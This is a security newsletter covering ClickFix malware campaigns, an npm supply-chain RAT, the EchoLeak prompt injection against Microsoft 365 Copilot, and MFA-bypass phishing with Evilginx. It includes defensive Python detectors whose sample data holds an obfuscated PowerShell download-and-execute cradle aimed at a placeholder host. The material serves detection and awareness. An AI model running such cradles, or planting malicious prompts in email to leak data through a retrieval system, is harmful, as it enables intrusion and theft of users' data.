Triaging the Week 074 

Hello there 👋 

Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!


Top 5 News Stories


Google Patches Critical Vulnerability Exposing Account-Linked Phone Numbers

Google has fixed a serious bug that allowed attackers to uncover phone numbers linked to accounts, posing risks for phishing and SIM-swapping attacks. The vulnerability, discovered by researcher BruteCat, was patched to protect users from potential identity theft and fraud.  

Key takeaways: 

🕵️‍♂️ Vulnerability Discovered: Security researcher BruteCat identified a flaw that enables attackers to brute-force phone numbers tied to Google accounts using only a profile name and partial phone number data. 

⚠️ Security Risks: The exposed phone numbers could be exploited for targeted phishing (vishing) or SIM swapping attacks, significantly compromising user privacy and account security. 

🛠️ Google’s Response: Google promptly patched the vulnerability to prevent further exploitation, safeguarding accounts from unauthorized access. 

🔒 Broader Implications: This incident underscores the ongoing need for robust security measures to safeguard sensitive personal information against evolving cyber threats. 

Brutecat 

New Atomic macOS Stealer Campaign Targets Apple Users with ClickFix Social Engineering

A new macOS malware campaign uses fake Spectrum CAPTCHA pages to deceive users into executing malicious scripts, which then deploy Atomic Stealer to harvest passwords and cryptocurrency wallets. The campaign, run by Russian-speaking cybercriminals, relies on ClickFix tactics; macOS users are urged to verify URLs and never run unsolicited commands. 

Key takeaways: 

🕵️ ClickFix Deception: The campaign employs the ClickFix social engineering tactic, using typosquatted Spectrum domains to serve fake CAPTCHA pages that trick macOS users into running malicious shell scripts via Terminal, deploying Atomic macOS Stealer (AMOS). 

🦠 Atomic Stealer Capabilities: AMOS, a Golang-based malware, steals system passwords, Keychain data, browser credentials, and cryptocurrency wallet details, with Russian language comments in the code suggesting Russian-speaking perpetrators. 

🔓 Bypassing Security: The malware utilizes native macOS commands to harvest credentials and circumvent security mechanisms, with poorly implemented delivery sites displaying mismatched instructions (e.g., Windows-specific commands for macOS users). 

🌐 Broader Campaign Context: The attack also targets Windows, Android, and iOS users with different payloads, utilizing drive-by downloads and redirections, aligning with a surge in ClickFix campaigns that deliver various malware families. 

🛡️ Mitigation Advice: Users should avoid executing Terminal commands from untrusted sources, verify website domains, update macOS and browsers, and use real-time antivirus protection to detect and block AMOS infections. 

🎯 Threat Hunting Package 

CloudSEK

Cybercriminals Exploit Booking.com with Fake Sites to Deploy AsyncRAT Malware

Cybercriminals are targeting travelers with fake Booking.com sites, using malicious links and ClickFix tactics to deliver AsyncRAT malware, stealing sensitive data. Travelers are urged to verify URLs and avoid suspicious instructions to stay safe during the holiday season.  

Key takeaways: 

🕵️ Fake Booking.com Sites: Since mid-May 2025, cybercriminals have used fake Booking.com websites, promoted via gaming sites, social media, and sponsored ads, to trick users into downloading AsyncRAT, a Remote Access Trojan, exploiting the 40% of travelers who book via general online searches. 

🦠 ClickFix Attack Method: The campaign employs a ClickFix social engineering tactic, prompting users to copy and paste obfuscated PowerShell scripts (e.g., “pOwERsheLl –N"O"p"rO"”) that execute hidden malware, granting attackers full control over infected devices to steal financial and personal data. 

🔄 Dynamic Redirects: The attack uses dynamic redirects, changing destinations every 2-3 days to evade detection, making it challenging for security teams to block the malicious sites.

🛡️ Mitigation Recommendations: Travelers should verify website URLs, avoid executing unsolicited scripts, and use trusted booking platforms directly, while Malwarebytes’ Scam Guard can help detect such phishing attempts. 

⚠️ Broader Threat Context: This campaign aligns with a rise in sophisticated scams targeting the hospitality industry, with fake CAPTCHAs and trusted platform abuse becoming common tactics to deceive both users and hotel staff.  

Malwarebytes 
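Both ClickFix stories above hinge on a user pasting a launcher command that has been made hard to read, such as the quote-insertion and mixed-case trick in the Booking.com lure. As an added example (not code from Malwarebytes, CloudSEK or the newsletter), here is a small Python checker that normalises a process command line the way PowerShell itself would read it and scores the signals a detection engineer would look for; it goes slightly beyond the story by also noting the usual hidden-window, encoded-command and download-cradle switches. The command lines, the `.invalid` host and the script path are constructed samples.

```python
QUOTES = '"\u201c\u201d'          # straight and curly double quotes
DASHES = "\u2013\u2014"           # en/em dashes that copy-paste turns a "-" into
LAUNCHERS = {"powershell", "pwsh"}
CRADLE_WORDS = ("iex", "invoke-expression", "iwr", "invoke-webrequest",
                "downloadstring", "frombase64string")

# Constructed process command lines (not real telemetry); the URL host is a placeholder.
SAMPLE_COMMAND_LINES = [
    'pOwERsheLl –N"O"p"rO" -w h -c "iex (iwr -useb http://PLACEHOLDER.invalid/x)"',
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\ops\\rotate-logs.ps1",
    "powershell -enc SQBFAFgA",    # base64 of UTF-16LE "IEX"
    "cmd.exe /c dir",
]

def clean(token: str) -> str:
    """Strip quote characters and normalise the leading dash: '–N"O"p"rO"' -> '-nopro'."""
    t = "".join(ch for ch in token if ch not in QUOTES).lower()
    return "-" + t[1:] if t and t[0] in DASHES else t

def case_flips(word: str) -> int:
    letters = [c for c in word if c.isalpha()]
    return sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))

def assess(cmdline: str) -> dict:
    tokens = cmdline.split()
    raw_exe = tokens[0].rsplit("\\", 1)[-1] if tokens else ""
    reasons = []
    if clean(raw_exe).removesuffix(".exe") not in LAUNCHERS:
        return {"level": "none", "reasons": reasons}
    if case_flips(raw_exe) > 3:   # "PowerShell" flips case 3 times, "pOwERsheLl" 6 times
        reasons.append("mixed-case launcher name")
    if any(ch in t[1:-1] for t in tokens for ch in QUOTES):   # quotes inside a token
        reasons.append("quotes inserted inside tokens")
    flags = [clean(t) for t in tokens[1:]]
    for i, f in enumerate(flags):
        nxt = flags[i + 1] if i + 1 < len(flags) else ""
        if f.startswith("-nop"):                      # -NoProfile and its prefixes
            reasons.append("-NoProfile")
        elif f.startswith("-w") and nxt.startswith("h"):
            reasons.append("hidden window")
        elif f in ("-e", "-ec") or f.startswith("-enc"):
            reasons.append("encoded command")
        elif f.startswith("-e") and nxt == "bypass":
            reasons.append("ExecutionPolicy Bypass")
    if any(w in " ".join(flags) for w in CRADLE_WORDS):
        reasons.append("download/execute cradle")
    obfuscated = {"mixed-case launcher name", "quotes inserted inside tokens"} & set(reasons)
    strong = {"encoded command", "download/execute cradle"} & set(reasons)
    level = "high" if obfuscated or strong else "medium" if reasons else "none"
    return {"level": level, "reasons": reasons}
```

The second sample line deliberately scores only "medium": a scheduled script with `-NoProfile -ExecutionPolicy Bypass` is common in administration, so the obfuscation and cradle signals, not the switches alone, are what separate a ClickFix paste from routine use.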

Massive Supply Chain Attack Targets Gluestack npm Packages, Endangering 960K Weekly Downloads

A supply chain attack has compromised 17 Gluestack npm packages, impacting over 960K weekly downloads with malicious code acting as a remote access trojan. Developers must urgently remove affected packages and roll back to secure versions to prevent data theft and system control. 

Key takeaways: 

🕵️ Widespread Compromise: cyber security firm Aikido Security discovered that 17 of 20 Gluestack @react-native-aria npm packages, with ~960,000 weekly downloads, were injected with malicious code in the lib/commonjs/index.js file, functioning as a remote access trojan (RAT). 

🦠 Malware Capabilities: The malicious code enables attackers to execute shell commands, capture screenshots, and upload files from infected systems, posing significant risks to developers and CI/CD pipelines that utilize these packages. 

📧 Covert Communication: The attack utilizes hardcoded SMTP credentials to establish a connection to an attacker-controlled mailbox, enabling data exfiltration and remote control, with new compromised versions being published as recently as June 7, 2025. 

🛡️ Mitigation Actions: Developers are urged to remove the affected packages, roll back to uncompromised versions (the affected versions have all been deprecated), and implement version pinning, dependency scanning, and file integrity monitoring to prevent further infections. 

⚠️ Broader Context: This attack follows a pattern of supply chain threats targeting open-source ecosystems, with similar incidents recently hitting npm, PyPI, and Ruby, highlighting the growing risk to software development pipelines. 

🎯 Threat Hunting Package 

Aikido
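The advisory names the scope (@react-native-aria), the file that carried the implant (lib/commonjs/index.js) and the behaviours it had (shell commands, screenshots, SMTP-based control). As an added example (not Aikido's tooling or anything from the advisory), this Python script walks an installed node_modules tree, restricts itself to that scope, and flags any package whose index.js shows those behaviours. The indicator regexes are an assumption derived from the described behaviours, not signatures of the real implant, and the sample package tree it builds is constructed.

```python
import json
import re
import tempfile
from pathlib import Path

# Scope and path come from the advisory: the Gluestack @react-native-aria packages and
# the file Aikido found the implant in. Indicator patterns are an assumption based on the
# behaviours the write-up describes, not signatures taken from the actual implant.
SCOPE = "@react-native-aria"
PAYLOAD_FILE = Path("lib") / "commonjs" / "index.js"
INDICATORS = {
    "shell execution": re.compile(r"child_process|\bexec(?:Sync)?\s*\(", re.I),
    "smtp credentials": re.compile(r"\bsmtp\b|nodemailer|createTransport", re.I),
    "screenshot": re.compile(r"screenshot", re.I),
}

def audit_node_modules(root: Path) -> list:
    """One record per in-scope installed package, flagged if its index.js matches an indicator."""
    findings = []
    for pkg_json in sorted((root / "node_modules" / SCOPE).glob("*/package.json")):
        meta = json.loads(pkg_json.read_text())
        target = pkg_json.parent / PAYLOAD_FILE
        text = target.read_text(errors="replace") if target.exists() else ""
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        findings.append({"name": meta.get("name"), "version": meta.get("version"),
                         "indicators": hits, "suspicious": bool(hits)})
    return findings

def build_sample_tree() -> Path:
    """Constructed fixture with one clean and one tampered package; not real package code."""
    root = Path(tempfile.mkdtemp())
    bodies = {
        "clean": "module.exports = { useButton() { return {}; } };",
        "tampered": "const cp = require('child_process');"
                    "const mail = { host: 'smtp.PLACEHOLDER.invalid', user: 'x', pass: 'x' };",
    }
    for name, body in bodies.items():
        pkg = root / "node_modules" / SCOPE / name
        (pkg / PAYLOAD_FILE).parent.mkdir(parents=True)
        (pkg / "package.json").write_text(json.dumps({"name": f"{SCOPE}/{name}", "version": "0.0.0-sample"}))
        (pkg / PAYLOAD_FILE).write_text(body)
    return root

if __name__ == "__main__":
    for f in audit_node_modules(build_sample_tree()):
        print("SUSPICIOUS" if f["suspicious"] else "clean     ", f["name"], f["version"], f["indicators"])
```

Treat a hit as a triage lead, not a verdict: confirm it by diffing the installed files against a known-good version of the same package, then pin the dependency so a later publish cannot silently pull in a tampered release.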

Microsoft 365 Copilot Zero-Click AI Flaw ‘EchoLeak’ Exposes Sensitive Data

A zero-click AI vulnerability, EchoLeak, in Microsoft 365 Copilot allowed attackers to steal sensitive data via email without user interaction. Discovered by Aim Security and patched by Microsoft, this first-of-its-kind flaw highlights new AI security risks.

Key takeaways:

🕵️‍♂️ EchoLeak Vulnerability: Discovered by Aim Security in January 2025, the zero-click flaw (CVE-2025-32711) in Microsoft 365 Copilot enabled attackers to exfiltrate sensitive data by embedding malicious prompts in emails, exploiting the AI’s Retrieval-Augmented Generation (RAG) engine.

⚠️ No User Interaction Needed: The attack required only sending an email, which Copilot could later retrieve during unrelated queries, thereby leaking data such as emails and documents without requiring user clicks or downloads.

🛠️ Microsoft’s Fix: Microsoft has patched the vulnerability, ensuring Copilot no longer processes malicious prompts; however, details on the fix remain limited.

🔍 New Threat Class: Dubbed an LLM Scope Violation, EchoLeak marks the first known zero-click AI attack, raising concerns about AI agents’ data handling and potential for similar vulnerabilities.

🔒 Industry Implications: The flaw highlights the need for enhanced AI security measures, as researchers caution that default settings may not be sufficient to protect sensitive data in AI-integrated systems.

Aim Security


Top Tips of the Week


Threat Intelligence

  • Conduct threat intelligence simulations. Practice scenarios to improve skills and readiness for real-world threats. 
  • Integrate CTI into threat intelligence platforms (TIPs). Streamline workflows for efficient data collection and analysis. 
  • Foster a threat intelligence culture. Ensure that all team members understand the value and application of threat intelligence. 

Threat Hunting

  • Implement a threat intelligence sharing agreement with trusted partners. External collaboration enhances overall capabilities. 
  • Share findings with the cybersecurity community. Collective insights strengthen everyone’s ability to respond to cyber threats. 
  • Use CTI to enhance threat hunting. Combine proactive and reactive strategies for a comprehensive security approach. 

Custom Tooling

  • Consider the maintainability of custom tools. Create solutions that are easy to update, modify, and adapt to changing requirements. 

Feature Video

The Pyramid of Pain models how much pain we can inflict on the bad guys. It shows that some IOCs (Indicators of Compromise) are more difficult for an adversary to change than others, and that denying the adversary certain indicators causes them a greater loss (more pain) than denying them others.  

As defenders, we should aim to target the indicators that cause a greater loss to the adversary to bolster our defenses!  

Feature Course


Learning Resources


Must Learn Python Tools for Cyber Security

If you write Python scripts for automation, incident response, threat hunting, or analysis, these four tools can radically improve your workflow: 

🚀 UV: A lightning-fast alternative to pip. UV installs packages 100x faster and automatically manages virtual environments. No more dependency nightmares. 

📊 Streamlit: Instantly turn your Python scripts into interactive dashboards. Perfect for visualizing logs, alerts, or risk scores without touching HTML/JS. 

🧪 python-dotenv: Keep your API keys and secrets out of your codebase. Just two lines to load .env files securely — essential for all your SOC automation. 

🎨 Rich & Textual: Create beautifully styled terminal UIs. Think live dashboards, CPU monitors, or colorful CLI tools — all from your console. 

Even if you’re not a developer full-time, these tools can help you move faster, stay secure, and build solutions that scale. 

Check out the video below to learn more about these excellent Python tools and start building faster, cleaner, and more secure code right now! 

Going Phishing With Evilginx

If you’re serious about simulating real-world phishing attacks, this breakdown is gold! It’s a deep dive on building a complete phishing infrastructure using Evilginx2 — the exact framework used in red team engagements to bypass MFA and capture session tokens. 

Here’s what stood out: 

🛠️ End-to-end setup: From domain registration (think: azureportal.cam) to DNS records and Azure VM config. 

🎣 Evilginx2 in action: Reverse proxy phishing that intercepts creds + MFA tokens in real time. 

🔒 Defensive value: Understand how attackers operate so you can design better detections, controls, and user training. 

If you’re on the blue team or the red team, watching how MFA can be sidestepped through legitimate-looking phishing lures is a must. Let’s sharpen our skills and stay one step ahead! 

Your Meetings Might Be the Hidden Vulnerability in Your Workflow

Ever sat in a meeting and thought, “This could’ve been a Slack message”? You’re not alone! 

But what if you could 10x the ROI of every meeting — and use AI to do it? Here are five tactical tips I just learned from a brilliant video on meeting strategy: 

🧠 Run a 3S test before every meeting: Sensitivity, Scope, Stakes — if it’s not high on all three, maybe it doesn’t need to be a meeting. 

🎯 Define the goal upfront — like an incident response plan, clarity BEFORE action is key. 

📂 Send context before — treat it like a briefing doc. AI tools like Otter can help collect insights from past meetings. 

🧑‍💻 Let AI take notes — Otter.ai auto-summarizes, freeing you to focus on real-time discussions and escalation paths. 

✅ Always end with clarity — document action items, assign ownership, and follow up fast. 

Whether you’re coordinating across SOC, GRC, engineering, or dev teams, this is how to stop wasting time and start making meetings a force multiplier. 

Cyber Security Awareness: Making it Real for Everyone

In a recent episode of Simply Defensive, Chuck Sapp, a cyber security awareness specialist, shared his unique approach to making cyber security engaging for all ages. 

Chuck’s journey from the Marine Corps and Army to the cyber security field gives him a unique perspective. He emphasizes the importance of understanding the specific threats relevant to particular audiences and using relatable storytelling to convey the message effectively. 

Key takeaways: 

💬 Tailored messaging: Cyber security awareness should be tailored to different age groups and their specific concerns. 

👥 Real-life examples: Using real-life examples, such as AI voice scams, makes cyber security concepts relatable. 

🤝 Collaboration: Partnership and open communication within cyber security teams are crucial for effective threat response. 

If you’re looking to break into the field, transition from another career, or move up the corporate ladder, this interview is packed with insights you can use. Give it a listen!